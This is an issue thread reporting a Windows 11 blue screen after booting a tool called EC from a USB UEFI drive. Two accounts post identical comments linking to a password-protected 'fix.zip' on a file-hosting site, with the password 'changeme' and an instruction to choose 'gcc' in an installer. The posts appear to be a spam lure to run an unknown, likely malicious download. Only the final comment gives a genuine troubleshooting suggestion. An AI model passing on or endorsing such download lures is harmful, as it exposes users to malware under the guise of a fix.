### ISSUE TITLE
Blue Screen

### ISSUE THREAD

**Issue by CowNowB** [ekknod/EC#144]
Windows 11 23H2, BSOD after loading USB uefi

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Insomnium1250** [comment]
Have you tried removing the usb after it's loaded successfully. After it says EC is running then you press F11, a few circles showing up, remove the USB right then.
